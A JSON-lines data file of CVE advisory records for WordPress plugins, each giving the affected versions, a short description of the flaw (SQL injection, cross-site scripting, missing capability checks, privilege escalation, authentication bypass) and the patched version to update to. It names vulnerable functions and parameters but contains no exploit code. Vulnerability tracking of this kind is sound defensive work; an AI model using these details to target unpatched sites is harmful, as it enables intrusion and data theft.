{"CVE_ID":"CVE-2024-10729","slug":"woocommerce-booking","versionImpact":"6.9.0","versionEndExcluding":"6.10.0","description":"The Booking & Appointment Plugin for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_google_calendar_data' function in versions up to, and including, 6.9.0. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update the site options arbitrarily.","recommendation":"Update to version 6.10.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.tychesoftwares.com\\\/docs\\\/docs\\\/booking-appointment-plugin-for-woocommerce-new\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/www.tychesoftwares.com\\\/docs\\\/docs\\\/booking-appointment-plugin-for-woocommerce-new\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ed215da-10c5-469b-bab2-923808feebd4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6ed215da-10c5-469b-bab2-923808feebd4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0789","slug":"wp-maintenance","versionImpact":"6.1.9.2","versionEndExcluding":"6.1.9.3","description":"The WP Maintenance plugin for WordPress is vulnerable to IP Address Spoofing in all versions up to, and including, 6.1.9.2 due to insufficient IP address validation and use of user-supplied HTTP headers as a primary method for IP retrieval. This makes it possible for unauthenticated attackers to bypass maintenance mode.","recommendation":"Update to version 6.1.9.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f6bbaa1-c50f-4dad-9e5b-04bdffd4a0ae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f6bbaa1-c50f-4dad-9e5b-04bdffd4a0ae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078682%40wp-maintenance%2Ftrunk&old=3069916%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078682%40wp-maintenance%2Ftrunk&old=3069916%40wp-maintenance%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0904","slug":"fancy-product-designer","versionEndExcluding":"6.1.81","description":"The Fancy Product Designer WordPress plugin before 6.1.81 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 6.1.81, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/baf4afc9-c20e-47d6-a798-75e15652d1e3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/baf4afc9-c20e-47d6-a798-75e15652d1e3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0596","slug":"awesome-support","versionImpact":"6.1.7","versionEndExcluding":"6.1.8","description":"The Awesome Support \u2013 WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the editor_html() function in all versions up to, and including, 6.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to view password protected and draft posts.","recommendation":"Update to version 6.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4358e2a-b7f6-44b6-a38a-5b27cb15e1cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4358e2a-b7f6-44b6-a38a-5b27cb15e1cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0595","slug":"awesome-support","versionImpact":"6.1.7","versionEndExcluding":"6.1.8","description":"The Awesome Support \u2013 WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wpas_get_users() function hooked via AJAX in all versions up to, and including, 6.1.7. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve user data such as emails.","recommendation":"Update to version 6.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfb77432-e58d-466e-a366-8b8d7f1b6982?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bfb77432-e58d-466e-a366-8b8d7f1b6982?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/functions-user.php#L765\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/functions-user.php#L765\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0594","slug":"awesome-support","versionImpact":"6.1.7","versionEndExcluding":"6.1.8","description":"The Awesome Support \u2013 WordPress HelpDesk & Support Plugin plugin for WordPress is vulnerable to union-based SQL Injection via the 'q' parameter of the wpas_get_users action in all versions up to, and including, 6.1.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 6.1.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8494a0f6-7079-4fba-9901-76932b002c5a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8494a0f6-7079-4fba-9901-76932b002c5a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/functions-user.php#L765\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/functions-user.php#L765\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/functions-user.php#L1279\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/awesome-support\\\/trunk\\\/includes\\\/functions-user.php#L1279\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033134%40awesome-support&new=3033134%40awesome-support&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48323","slug":"awesome-support","versionEndExcluding":"6.1.5","description":"Cross-Site Request Forgery (CSRF) vulnerability in Awesome Support Team Awesome Support \u2013 WordPress HelpDesk & Support Plugin allows Cross-Site Request Forgery. This issue affects Awesome Support \u2013 WordPress HelpDesk & Support Plugin: from n\/a through 6.1.4.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/awesome-support\\\/wordpress-awesome-support-wordpress-helpdesk-support-plugin-plugin-6-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/awesome-support\\\/wordpress-awesome-support-wordpress-helpdesk-support-plugin-plugin-6-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5355","slug":"awesome-support","versionImpact":"6.1.4","versionEndExcluding":"6.1.5","description":"The Awesome Support WordPress plugin before 6.1.5 does not sanitize file paths when deleting temporary attachment files, allowing a ticket submitter to delete arbitrary files on the server.","recommendation":"Update to version 6.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6f7faca-dacf-4455-a837-0404803d0f25\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d6f7faca-dacf-4455-a837-0404803d0f25\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5354","slug":"awesome-support","versionImpact":"6.1.4","versionEndExcluding":"6.1.5","description":"The Awesome Support WordPress plugin before 6.1.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 6.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa380524-031d-4e49-9d0b-96e62d54557f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/aa380524-031d-4e49-9d0b-96e62d54557f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5352","slug":"awesome-support","versionImpact":"6.1.4","versionEndExcluding":"6.1.5","description":"The Awesome Support WordPress plugin before 6.1.5 does not correctly authorize the wpas_edit_reply function, allowing users to edit posts for which they do not have permission.","recommendation":"Update to version 6.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d32b2136-d923-4f36-bd76-af4578deb23b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d32b2136-d923-4f36-bd76-af4578deb23b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0365","slug":"fancy-product-designer","versionImpact":"6.1.4","versionEndExcluding":"6.1.5","description":"The Fancy Product Designer WordPress plugin before 6.1.5 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by administrators.","recommendation":"Update to version 6.1.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4b8b9638-d52a-40bc-b298-ae1c74788c18\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4b8b9638-d52a-40bc-b298-ae1c74788c18\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12156","slug":"seo-help","versionImpact":"6.1.3","versionEndExcluding":"6.1.4","description":"The AI Content Writer, RSS Feed to Post, Autoblogging SEO Help plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 6.1.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 6.1.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-help\\\/trunk\\\/inc\\\/scan-list-scan-table-header-results.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/seo-help\\\/trunk\\\/inc\\\/scan-list-scan-table-header-results.php#L102\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204821%40seo-help&new=3204821%40seo-help&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3204821%40seo-help&new=3204821%40seo-help&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5111215-7ce9-46e3-b247-c3f0f28ec094?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5111215-7ce9-46e3-b247-c3f0f28ec094?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3104","slug":"wp-staging-pro","versionImpact":"6.1.2","versionEndExcluding":"6.1.3","description":"The WP STAGING Pro WordPress Backup Plugin for WordPress is vulnerable to Information Exposure in all versions up to and including 6.1.2 due to missing capability checks on the getOutdatedPluginsRequest() function. This makes it possible for unauthenticated attackers to reveal outdated installed active or inactive plugins.","recommendation":"Update to version 6.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wp-staging.com\\\/wp-staging-pro-changelog\\\/\",\"name\":\"https:\\\/\\\/wp-staging.com\\\/wp-staging-pro-changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/572e290e-9324-4c17-8c3b-fa67233b15c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/572e290e-9324-4c17-8c3b-fa67233b15c4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6244","slug":"essential-addons-for-elementor-lite","versionImpact":"6.1.19","versionEndExcluding":"6.1.20","description":"The Essential Addons for Elementor \u2013 Popular Elementor Templates and Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `Calendar` and `Business Reviews` widgets' attributes in all versions up to, and including, 6.1.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.1.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318211\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3318211\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/847a4fc7-3580-421e-8045-41b5a85f2d97?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/847a4fc7-3580-421e-8045-41b5a85f2d97?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10146","slug":"simple-file-list","versionImpact":"6.1.12","versionEndExcluding":"6.1.13","description":"The Simple File List WordPress plugin before 6.1.13 does not sanitise and escape a generated URL before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against admins.","recommendation":"Update to version 6.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ee74a0f-83ff-4c15-a114-f8f6baab8bf5\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9ee74a0f-83ff-4c15-a114-f8f6baab8bf5\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9994","slug":"essential-addons-for-elementor-lite","versionImpact":"6.1.12","versionEndExcluding":"6.1.13","description":"The Essential Addons for Elementor \u2013 Best Elementor Addon, Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the eael_pricing_item_tooltip_content parameter of the Pricing Table Widget in all versions up to, and including, 6.1.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/6.0.7\\\/includes\\\/Elements\\\/Pricing_Table.php#L2164\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/6.0.7\\\/includes\\\/Elements\\\/Pricing_Table.php#L2164\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/855ae993-d887-4416-9b3c-8274a90dce5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/855ae993-d887-4416-9b3c-8274a90dce5f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9993","slug":"essential-addons-for-elementor-lite","versionImpact":"6.1.12","versionEndExcluding":"6.1.13","description":"The Essential Addons for Elementor \u2013 Best Elementor Addon, Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the eael_event_details_text parameter of Event Calendar Widget in all versions up to, and including, 6.1.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.1.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/6.0.7\\\/includes\\\/Elements\\\/Event_Calendar.php#L3079\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/essential-addons-for-elementor-lite\\\/tags\\\/6.0.7\\\/includes\\\/Elements\\\/Event_Calendar.php#L3079\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8de8a0b-0b70-4e8a-8cc4-06cc50d06a02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8de8a0b-0b70-4e8a-8cc4-06cc50d06a02?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12504","slug":"videowhisper-live-streaming-integration","versionImpact":"6.1.9","versionEndExcluding":"6.1.10","description":"The Broadcast Live Video \u2013 Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_hls' shortcode in all versions up to, and including, 6.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 6.1.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218331%40videowhisper-live-streaming-integration&new=3218331%40videowhisper-live-streaming-integration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218331%40videowhisper-live-streaming-integration&new=3218331%40videowhisper-live-streaming-integration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74b27798-3c6f-4c4e-80f8-7aa40f704fb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/74b27798-3c6f-4c4e-80f8-7aa40f704fb7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2376","slug":"wpqa","versionImpact":"6.1.0","versionEndExcluding":"6.1.1","description":"The WPQA Builder WordPress plugin before 6.1.1 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 6.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bdd2e323-d589-4050-bc27-5edd2507a818\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/bdd2e323-d589-4050-bc27-5edd2507a818\\\/\",\"refsource\":\"\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-2375","slug":"wpqa","versionImpact":"6.1.0","versionEndExcluding":"6.1.1","description":"The WPQA Builder WordPress plugin before 6.1.1 does not sanitise and escape some of its Slider settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 6.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d144e1c-a1f4-4c5a-93e2-4296a96d4ba2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3d144e1c-a1f4-4c5a-93e2-4296a96d4ba2\\\/\",\"refsource\":\"\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-8350","slug":"uncanny-learndash-groups","versionImpact":"6.1.0.1","versionEndExcluding":"6.1.1","description":"The Uncanny Groups for LearnDash plugin for WordPress is vulnerable to unauthorized addition of users to groups due to a missing capability check on the \/wp-json\/ulgm_management\/v1\/add_user\/ REST API endpoint in all versions up to, and including, 6.1.0.1. This makes it possible for authenticated attackers, with group leader-level access and above, to add users to their group, which in turn allows them to chain CVE-2024-8349 and gain admin access to the site.","recommendation":"Update to version 6.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a38a58de-5f7d-4033-9a65-41b590b7d510?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a38a58de-5f7d-4033-9a65-41b590b7d510?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-8349-and-CVE-2024-8350\",\"name\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-8349-and-CVE-2024-8350\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8349","slug":"uncanny-learndash-groups","versionImpact":"6.1.0.1","versionEndExcluding":"6.1.1","description":"The Uncanny Groups for LearnDash plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 6.1.0.1. This is due to the plugin not properly restricting what users a group leader can edit. This makes it possible for authenticated attackers, with group leader-level access and above, to change admin account email addresses which can subsequently lead to admin account access.","recommendation":"Update to version 6.1.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64cf0ae2-8d66-40d1-8bb6-0cab1dafab0d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64cf0ae2-8d66-40d1-8bb6-0cab1dafab0d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-8349-and-CVE-2024-8350\",\"name\":\"https:\\\/\\\/github.com\\\/karlemilnikka\\\/CVE-2024-8349-and-CVE-2024-8350\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5946","slug":"digirisk","versionImpact":"6.0.0.0","versionEndExcluding":"6.1.0.0","description":"The Digirisk plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'current_group_id' parameter in version 6.0.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 6.1.0.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d41355ed-77d0-48b3-bbb3-4cc3b4df4b2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d41355ed-77d0-48b3-bbb3-4cc3b4df4b2a?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1428184\\\/digirisk\\\/trunk\\\/modules\\\/society\\\/controller\\\/group.controller.01.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/1428184\\\/digirisk\\\/trunk\\\/modules\\\/society\\\/controller\\\/group.controller.01.php\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4947","slug":"woocommerce-ean-payment-gateway","versionEndExcluding":"6.1.0","description":"The WooCommerce EAN Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the refresh_order_ean_data AJAX action in versions up to 6.1.0. This makes it possible for authenticated attackers with contributor-level access and above, to update EAN numbers for orders.","recommendation":"Update to version 6.1.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2760b183-3c15-4f0e-b72f-7c0333f9d4b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2760b183-3c15-4f0e-b72f-7c0333f9d4b6?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.yanco.dk\\\/product\\\/woocommerce-ean-payment-gateway\\\/\",\"name\":\"https:\\\/\\\/plugins.yanco.dk\\\/product\\\/woocommerce-ean-payment-gateway\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-35910","slug":"quasar-form","versionEndExcluding":"6.1","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Nucleus_genius Quasar form free \u2013 Contact Form Builder for WordPress allows SQL Injection. This issue affects Quasar form free \u2013 Contact Form Builder for WordPress: from n\/a through 6.0.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/quasar-form\\\/wordpress-quasar-form-plugin-6-0-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/quasar-form\\\/wordpress-quasar-form-plugin-6-0-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0816","slug":"formidable","versionEndExcluding":"6.1","description":"The Formidable Forms WordPress plugin before 6.1 uses several potentially untrusted headers to determine the IP address of the client, leading to IP Address spoofing and bypass of anti-spam protections.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a281f63f-e295-4666-8a08-01b23cd5a744\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a281f63f-e295-4666-8a08-01b23cd5a744\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5947","slug":"sf-booking","versionImpact":"6.0","versionEndExcluding":"6.1","description":"The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via authentication bypass in all versions up to, and including, 6.0. This is due to the plugin not properly validating a user's cookie value prior to logging them in through the service_finder_switch_back() function. This makes it possible for unauthenticated attackers to login as any user including admins.","recommendation":"Update to version 6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1fe4f60-d93b-4071-90ae-ac863c17fe19?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c1fe4f60-d93b-4071-90ae-ac863c17fe19?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
